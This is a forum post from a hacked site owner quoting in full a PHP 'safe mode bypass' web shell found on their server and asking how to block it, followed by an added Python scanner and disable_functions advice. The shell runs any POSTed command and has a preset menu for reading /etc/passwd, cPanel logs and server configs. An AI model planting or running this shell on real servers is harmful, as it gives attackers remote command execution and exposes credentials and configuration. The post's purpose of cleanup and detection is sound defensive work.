I got hacked and the following code was placed within my files:
Code:
<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would I patch this? Like, is there any code I can add to a global file to prevent this "safemode bypass"?
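A cleanup aid for the situation in the post, added here as an example and not part of the original post: a Python heuristic that flags PHP files combining the three traits visible in the posted code, namely `ini_restore()` on `safe_mode` or `open_basedir`, a command-execution function called on a variable, and request input. The function names, verdict labels and sample strings are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Patterns drawn from the code posted above; a heuristic, not a PHP parser.
RESTORE = re.compile(r"ini_restore\s*\(\s*[\"'](safe_mode|open_basedir)[\"']", re.I)
EXEC_VAR = re.compile(r"(?<![\w>$])@?(exec|shell_exec|system|passthru|popen)\s*\(\s*\$", re.I)
REQUEST = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")


def findings(php_source):
    """Return the sorted indicator strings found in one PHP source text."""
    found = {"ini_restore:" + m.group(1).lower() for m in RESTORE.finditer(php_source)}
    found |= {"exec_var:" + m.group(1).lower() for m in EXEC_VAR.finditer(php_source)}
    if REQUEST.search(php_source):
        found.add("request_input")
    return sorted(found)


def verdict(found):
    """'suspicious' only when all three indicator kinds occur in the same file."""
    kinds = {f.split(":")[0] for f in found}
    if {"ini_restore", "exec_var", "request_input"} <= kinds:
        return "suspicious"
    return "review" if "ini_restore" in kinds else "clean"


def scan_tree(root):
    """Yield (path, verdict, findings) for each .php file under root that is not clean."""
    for path in sorted(Path(root).rglob("*.php")):
        found = findings(path.read_text(errors="replace"))
        if verdict(found) != "clean":
            yield str(path), verdict(found), found


# Constructed sample: a few lines condensed from the posted code.
SAMPLE = '''<?
ini_restore("safe_mode");
ini_restore("open_basedir");
function safeshell($komut) { @exec($komut,$res); return $res; }
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
?>'''
# Constructed benign page that reads request input but runs no commands.
BENIGN = '<?php $name = htmlspecialchars($_GET["name"]); echo "Hello $name"; ?>'

if __name__ == "__main__":
    for path, level, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, level, ",".join(found), sep="\t")
```

Files it reports still need manual review. On the prevention side, PHP's `disable_functions` directive in php.ini can turn off `ini_restore` and the command-execution functions for every script.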